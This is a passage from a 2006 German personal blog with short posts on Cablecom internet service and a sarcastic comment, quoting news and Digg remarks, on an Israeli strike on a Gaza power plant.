Zum Glück hatten wir in den letzten vier (?) Jahren noch keinen Bedarf nach einem (Schlaf-)Techniker von Cablecom …

Tags:
Labels: Uncategorized

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 2. Juli 2006

Unter Freunden …

… zerbombt man einander auch ‚mal ein Kraftwerk:

A Western aid official involved in the matter said Israel’s decision to hit the power plant was a surprise in large part „because it was American-owned.“

The Israeli army, in a statement, defended the attack, saying the power plant was targeted „in order to disrupt the activities of the terror infrastructure involved directly and indirectly in the abduction of Corporal Shalit.“

Quelle: Israeli strike on Gaza power plant will cost US

Auf Digg gab es einige pointierte Kommentare:

So to make it more difficult for the terrorists to move around a kidnapped soldier, Israel’s first move was…to kill all the electric lights?

Does this whole offensive really have anything to do with the kidnapping at all?
Yeah, I guess they’d never hide in the dark.

Quelle: Israeli strike on Gaza power plant will cost US taxpayers $48,000,000

Naja, man hat ja auch Brücken weggebombt, damit die Kidnapper nicht fliehen können. Wer sagt denn, dass die den Soldaten mit dem Auto umherfahren?

Tags:
Labels: Uncategorized

Keine Kommentare | neuen Kommentar verfassen

Samstag, 1. Juli 2006

Cablecom Hispeed: Erfüllt


Traffic records II
Originally uploaded by emeidi.

Die vor einem Monat versprochene Geschwindigkeitssteigerung macht sich nun endlich auch bei P2P-Downloads bemerkbar …

Tags:
Labels: Uncategorized

Keine Kommentare | neuen Kommentar verfassen